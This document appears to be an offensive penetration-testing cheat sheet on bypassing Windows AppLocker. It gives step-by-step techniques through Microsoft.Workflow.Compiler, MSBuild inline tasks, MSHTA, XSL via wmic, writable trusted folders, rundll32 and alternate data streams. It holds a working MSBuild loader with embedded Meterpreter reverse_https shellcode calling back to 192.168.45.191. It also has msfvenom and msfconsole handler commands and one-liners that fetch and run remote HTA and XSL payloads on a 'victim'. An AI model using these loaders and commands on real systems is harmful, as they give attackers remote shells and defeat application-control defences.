Note: AppLocker rules are not applied to processes running as the built-in service accounts Local System, Local Service and Network Service, nor to the IIS DefaultAppPool identity — code that executes in one of those contexts is outside the policy altogether.

Arbitrary C# Using Workflow Compiler

  1. Run the following PowerShell code:
# Build the XML "wrapper" input that Microsoft.Workflow.Compiler.exe consumes.
# The wrapper is generated by the compiler's own non-public helper
# CompilerWrapper.SerializeInputToWrapper, reached through reflection.
$fxDir             = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319'
$compilerExe       = Join-Path $fxDir 'Microsoft.Workflow.Compiler.exe'
$componentModelDll = Join-Path $fxDir 'System.Workflow.ComponentModel.dll'

# Load the compiler assembly so its internal types can be resolved below.
$null = [Reflection.Assembly]::LoadFrom($compilerExe)
$serializer = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')

# WorkflowCompilerParameters is defined in System.Workflow.ComponentModel.
Add-Type -Path $componentModelDll
$parameters = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$parameters.GenerateInMemory = $True

# The source path is written into the wrapper as given here (relative, not
# resolved), so it is resolved by Microsoft.Workflow.Compiler.exe against its
# working directory at step 4 -- inspect run.xml to confirm.
$sourceFile = 'test.txt'
$output     = 'C:\Tools\run.xml'   # reused by the ACL step that follows

# Returns the path of a temporary wrapper file; move it to the chosen location.
$wrapperPath = $serializer.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $parameters, [String[]] @(, $sourceFile)))
Move-Item -Path $wrapperPath -Destination $output

2. Then run the following (replace student with the actual username). It needs an elevated prompt and must run in the same PowerShell session as step 1, because it reuses $output. If it fails, you can still try to continue:

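# Grant the target user full control over run.xml. The quote characters are
# normalised to plain ASCII (the original mixed typographic and straight quotes),
# so the line survives copy/paste. Requires $output from step 1 (same session)
# and an elevated prompt.
$acl = Get-Acl $output
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule('student', 'FullControl', 'None', 'None', 'Allow')
$acl.AddAccessRule($rule)
Set-Acl -Path $output -AclObject $acl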

3. Create test.txt with the following C# code. Put it in the directory you will run step 4 from, because run.xml refers to it by the relative path given in step 1:

using System;
using System.Workflow.ComponentModel;
public class Run : Activity
{
    // Marker printed to prove that code inside the Activity ran.
    private const string Marker = "I executed!";

    // Payload entry point: this constructor is what executes when
    // Microsoft.Workflow.Compiler.exe compiles and instantiates the activity
    // in step 4, so the real payload replaces the WriteLine. Keep the syntax
    // at C# 5 level -- the in-box v4.0.30319 compiler does not accept newer
    // constructs such as expression-bodied members.
    public Run()
    {
        Console.WriteLine(Marker);
    }
}

4. Run the following from cmd, in the directory that contains test.txt (run.xml stores the relative path from step 1):

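rem run.xml stores the source path exactly as given in step 1 ("test.txt" --
rem check run.xml), so Microsoft.Workflow.Compiler.exe must be started from the
rem directory holding test.txt (C:\Tools here, next to run.xml). An absolute
rem path for run.xml keeps the command independent of where cmd was opened.
cd /d C:\Tools
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Tools\run.xml results.xml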

Arbitrary C# shellcode using MSBuild

  1. Generate shellcode using msfvenom:
    # EXITFUNC=thread makes the shellcode exit via ExitThread rather than
    # ExitProcess, matching the loader's CreateThread/WaitForSingleObject pattern.
    msfvenom --payload windows/x64/meterpreter/reverse_https LHOST=IP LPORT=PORT EXITFUNC=thread --format csharp

  2. Save the following file as test.csproj, replacing the byte array in `buf` with the msfvenom output from step 1 (the bytes shown are a stale sample — they embed the callback host 192.168.45.191 in plaintext):

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes x64 shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe test.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
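        public class ClassExample : Task, ITask
        {
            // VirtualAlloc flags: MEM_COMMIT | MEM_RESERVE, and PAGE_EXECUTE_READWRITE.
            private const uint MemCommitReserve = 0x3000;
            private const uint PageExecuteReadWrite = 0x40;
            // WaitForSingleObject timeout meaning "wait forever" (INFINITE).
            private const uint Infinite = 0xFFFFFFFF;

            [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
            static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
                uint flAllocationType, uint flProtect);

            [DllImport("kernel32.dll", SetLastError = true)]
            static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
                IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

            [DllImport("kernel32.dll")]
            static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

            /// <summary>
            /// Copies the embedded x64 shellcode into an RWX allocation and runs it on
            /// a new thread, blocking until that thread exits (which keeps msbuild.exe
            /// alive while the payload runs). Returns true so MSBuild reports the
            /// target as succeeded; returns false if allocation or thread creation
            /// fails instead of dereferencing a null pointer.
            /// </summary>
            public override bool Execute()
            {
                // No explicit array length: a pasted payload of any size compiles
                // (with the previous "new byte[764]" form, a replacement of a
                // different length is a compile error). NOTE: the bytes below are a
                // stale msfvenom sample -- "192.168.45.191" is visible in them --
                // and must be replaced with the output of step 1.
                byte[] buf = new byte[] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,
0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,
0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x48,
0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x41,0x51,0x66,
0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0x50,
0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,
0x48,0x01,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,
0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,
0x49,0xc7,0xc2,0x4c,0x77,0x26,0x07,0xff,0xd5,0x53,0x53,0x48,
0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,
0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0f,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,
0x2e,0x34,0x35,0x2e,0x31,0x39,0x31,0x00,0x5a,0x48,0x89,0xc1,
0x49,0xc7,0xc0,0x05,0x0d,0x00,0x00,0x4d,0x31,0xc9,0x53,0x53,
0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,0x00,
0x00,0xff,0xd5,0xe8,0xd1,0x00,0x00,0x00,0x2f,0x47,0x6c,0x45,
0x37,0x5f,0x34,0x69,0x73,0x33,0x2d,0x48,0x79,0x46,0x66,0x4d,
0x58,0x6c,0x57,0x39,0x55,0x73,0x67,0x62,0x38,0x33,0x71,0x2d,
0x57,0x65,0x56,0x2d,0x52,0x72,0x68,0x4e,0x42,0x65,0x46,0x5f,
0x33,0x41,0x74,0x49,0x63,0x67,0x53,0x42,0x4f,0x57,0x66,0x59,
0x61,0x39,0x6e,0x4a,0x38,0x5f,0x54,0x4a,0x4f,0x44,0x74,0x49,
0x57,0x55,0x74,0x50,0x6e,0x6e,0x43,0x59,0x32,0x6f,0x52,0x35,
0x46,0x41,0x33,0x41,0x56,0x67,0x74,0x4e,0x30,0x6c,0x30,0x4e,
0x4d,0x53,0x66,0x42,0x78,0x79,0x66,0x33,0x53,0x72,0x39,0x78,
0x47,0x6e,0x53,0x43,0x57,0x78,0x67,0x30,0x64,0x67,0x51,0x48,
0x65,0x53,0x59,0x79,0x64,0x78,0x56,0x5a,0x66,0x2d,0x33,0x47,
0x71,0x56,0x36,0x51,0x61,0x36,0x4c,0x6e,0x41,0x64,0x6b,0x52,
0x63,0x32,0x44,0x67,0x43,0x55,0x33,0x54,0x74,0x4f,0x4c,0x61,
0x5f,0x62,0x71,0x33,0x78,0x46,0x64,0x68,0x43,0x50,0x53,0x37,
0x30,0x32,0x32,0x39,0x6c,0x44,0x76,0x46,0x74,0x56,0x2d,0x63,
0x47,0x61,0x44,0x50,0x31,0x77,0x6a,0x49,0x51,0x4d,0x70,0x39,
0x59,0x45,0x69,0x4a,0x49,0x76,0x49,0x7a,0x37,0x6d,0x6a,0x58,
0x5f,0x6e,0x42,0x50,0x69,0x4f,0x56,0x57,0x6e,0x45,0x52,0x72,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,
0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,0x50,0x53,
0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,
0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,
0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,
0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,
0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,
0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,
0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,
0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,0x53,0xe5,0x00,
0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,
0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,
0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,
0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,
0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,
0xff,0xd5};

                int size = buf.Length;

                // Size the allocation by the payload instead of a fixed 0x1000 bytes:
                // a larger payload (e.g. a stageless one) would otherwise be written
                // past the end of the single page by Marshal.Copy.
                IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, MemCommitReserve, PageExecuteReadWrite);
                if (addr == IntPtr.Zero)
                {
                    Log.LogError("VirtualAlloc failed, Win32 error " + Marshal.GetLastWin32Error());
                    return false;
                }

                Marshal.Copy(buf, 0, addr, size);

                IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
                if (hThread == IntPtr.Zero)
                {
                    Log.LogError("CreateThread failed, Win32 error " + Marshal.GetLastWin32Error());
                    return false;
                }

                // Block forever on the payload thread so the hosting msbuild.exe does
                // not exit underneath the session; pairs with EXITFUNC=thread in step 1.
                WaitForSingleObject(hThread, Infinite);

                return true;
            }
        }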
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

3. Start the handler on the attacker machine (same LHOST/LPORT as in step 1):

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST IP
set LPORT PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
run

4. Run the following on the victim (use the 64-bit msbuild.exe under Framework64, because the shellcode is x64):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe test.csproj

Arbitrary JScript Using MSHTA

  1. Create the .js file using method listed in Antivirus Evasion -> Methods -> Full Process Hollowing + AMSI with Jscript.

  2. Wrap the .js file content in an HTA as shown below:

<html> 
<head>
</head> 
<body>
<!-- mshta.exe executes the inline JScript block below; replace the
     placeholder with the .js content produced in step 1. -->
<script language="JScript">

ORIGINAL JS FILE CONTENT HERE

</script>
</body> 
</html>

3. Rename the file to runner.hta

4. Start the handler on the attacker machine:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST IP
set LPORT PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
run

5a. Execute it (important: give mshta the full path to the .hta file):
mshta c:\users\offsec\documents\runner.hta

5b. Or create a shortcut (right-click the desktop, New -> Shortcut) whose target fetches the HTA over HTTP from your server:
C:\Windows\System32\mshta.exe http://IP/runner.hta

Arbitrary JScript Using XSL

  1. Create the .js file using method listed in Antivirus Evasion -> Methods -> Full Process Hollowing + AMSI with Jscript.

  2. Wrap the .js file content in an XSL stylesheet as shown below:

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<!-- The ms:script extension block runs when wmic applies this stylesheet
	     (step 5). Paste the .js content from step 1 over the placeholder and
	     keep it inside the CDATA section, so characters such as < and & in
	     the script do not break the XML. -->
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[

        ORIGINAL JS FILE CONTENT HERE

        ]]>
	</ms:script>
</stylesheet>

3. Rename the file to runner.xsl and host it on your Kali machine (e.g. copy it to Apache's web root, /var/www/html), making sure Apache is running:
sudo systemctl restart apache2

4. Start the handler on the attacker machine:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST IP
set LPORT PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
run

5. Run the following on the victim (wmic fetches the remote XSL and executes the script embedded in it; note that wmic.exe is deprecated and may be absent on recent Windows 11 builds):
wmic process get brief /format:"http://IP/runner.xsl"

Trusted Folder Bypass

  1. Use Sysinternals AccessChk to list folders under C:\Windows that your user can write to (-w = show only objects with write access, -u = suppress errors, -s = recurse). It is also worth checking:
    C:\Program Files
    C:\Program Files (x86)
accesschk.exe "username" C:\Windows -wus
  2. Then run icacls on a candidate from the results (C:\Windows\Tasks in this example) to confirm the rights. Look for an entry for your user, or a group you belong to, that grants write (W, M or F) together with execute (RX or F) — RX on its own means read and execute, not write: icacls.exe C:\Windows\Tasks

  3. Copy your payload (executable or script) into that folder and run it from there; the default AppLocker rules allow everything under a trusted path such as C:\Windows, so a writable subfolder is enough to bypass them.

Bypass with DLL

  1. If DLL rule enforcement is not enabled (the DLL rule collection is off by default), you can put the payload in a DLL and load it with rundll32 (in the example below the exported function is named run): rundll32 C:\Tools\TestDll.dll,run

Alternate Data Streams

  1. First find a file that you can write to and that sits under a path the AppLocker rules trust (same search as in Trusted Folder Bypass), then write your JScript payload into an alternate data stream of that file: type test.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

  2. Execute it with wscript, referencing the stream: wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

Third Party Execution

  1. VBA in Microsoft Office and third-party interpreters such as Python, Perl and Java are outside AppLocker's rule collections (executables, DLLs, Windows Installer, scripts and packaged apps), so code run through them is not blocked by the policy — provided the interpreter itself is allowed to execute.